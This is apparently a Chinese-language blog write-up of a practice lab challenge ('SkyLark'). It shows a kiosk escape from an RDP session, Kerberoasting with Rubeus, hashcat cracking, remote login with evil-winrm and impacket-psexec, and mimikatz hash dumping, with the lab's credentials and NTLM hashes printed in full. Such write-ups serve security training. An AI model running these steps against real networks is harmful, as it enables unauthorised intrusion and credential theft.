Challenge 3 - SkyLark(3)

 Challenge 3 - SkyLark(3)


下一步鎖定的機器是 .221



選擇這一台的原因是在上一節中讀到了一個 user-guide-rdweb.pdf

當中告知網站的名稱是 /RDWeb 且提供了一組帳號密碼 SKYLARK\kiosk:XEwUS^9R2Gwt8O914

重新枚舉相關機器在 .221 發現如下的 /RDWeb



使用提供的帳號密碼登入後如下圖



點選了圖中的 "SkylarkStatus" 圖示後下載了一個 "cpub-SkylarkStatus-QuickSessionCollection-CmsRdsh.rdp" 檔案



測試使用指令└─$ xfreerdp cpub-SkylarkStatus-QuickSessionCollection-CmsRdsh.rdp /d:SKYLARK /u:kiosk /p:XEwUS^9R2Gwt8O914

顯示錯誤訊息寫 "freerdp_tcp_is_hostname_resolvable:freerdp_set_last_error_ex ERRCONNECT_DNS_NAME_NOT_FOUND"

這個看來是名稱解析錯誤



查了一下該 RDP 使用的名稱是 "AUSTIN02.SKYLARK.COM"



寫死 Hosts file



再測試一次,xfreerdp cpub-SkylarkStatus-QuickSessionCollection-CmsRdsh.rdp /d:SKYLARK /u:kiosk /p:XEwUS^9R2Gwt8O914

出現如下圖的畫面



點選 config file 直接跳出 Windows 檔案總管



直接在檔案總管的路徑輸入 c:\windows\system32\cmd.exe 成功叫出 command line



直接拿到第一階段的 flag



whoami /priv 沒有甚麼權限



.\Rubeus.exe asreproast /nowrap 看來沒有東西



使用 .\Rubeus.exe kerberroast /nowrap 沒有產出結果

改用 .\Rubeus.exe kerberoast /outfile:hashes.kerberoast 發現 backup_service 帳號

SPN : AUSTIN02/backup_service.SKYLARK.com:6000



有產出該服務帳號的 hash



hashcat 破解看看,└─$ hashcat -m 13100 backup_service.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

破解出密碼 It4Server


crackmapexec 測試看看發現是管理者




evil-winrm 可以直接進去,└─$ evil-winrm -i 192.168.196.221 -u 'SKYLARK\backup_service' -p 'It4Server'



impacket-psexec 也沒有問題,impacket-psexec skylark.com/backup_service:It4Server@192.168.196.221,登入後直接拿取第二階段 flag



進階枚舉,執行 mimikatz.exe 得到 .221 administrator NTLM hash 如下

 17add237f30abaecc9d884f72958b928



RDWebAccess hash 480ee0be16785696cb0d734518dc8c31



跑 bloodhound 看一下,發現原來 backup_service 既然是 Domain Admins 成員



.221 這一台有兩隻腳,要進內網可以透過這一台搭建通道



更新攻擊列表



使用者看來有 10 個人



先更新一版暫時的密碼表,已經拿到 Domain Admin

等進到 DC 再來更新完整版



留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)